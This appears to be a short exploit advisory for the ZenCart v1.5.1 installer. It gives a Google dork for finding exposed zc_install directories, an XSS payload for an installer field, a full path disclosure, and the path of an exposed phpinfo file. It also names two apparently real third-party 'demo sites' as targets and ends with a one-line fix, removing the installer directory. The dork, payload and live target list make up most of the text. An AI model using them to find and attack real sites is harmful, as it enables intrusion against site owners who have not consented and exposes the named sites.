Exploit Title: ZenCart v1.5.1 – Multiple Vulnerabilities
Exploit Author: UmPire
Date: 21 Feb 2014
Vendor Homepage: https://www.zen-cart.com/
Version: 1.5.1
Tested on: Windows
Google Dork: inurl:”zc_install/index.php”

Cross Site Scripting Vulnerability
In the fourth step of installation, there are vulnerable fields.
vulnerable input: ” onmouseover=alert(/Hacked/) bad=”

Full Path Disclosure
In the third step of installation there is this vulnerability
Path_Translated = Drive:\\[WebPage-Directiory]\\[USER]\\zen\\zc_install\\index.php

Sensitive phpinfo reading
This is in this path:
http://[Host]/zen/zc_install/includes/phpinfo.php

Demo sites:
http://dublinerXstl.com/zencart/zc_install/index.php
http://www.fickXle.jp/zen/zc_install/index.php

Patch:
Simply remove zc_install directory.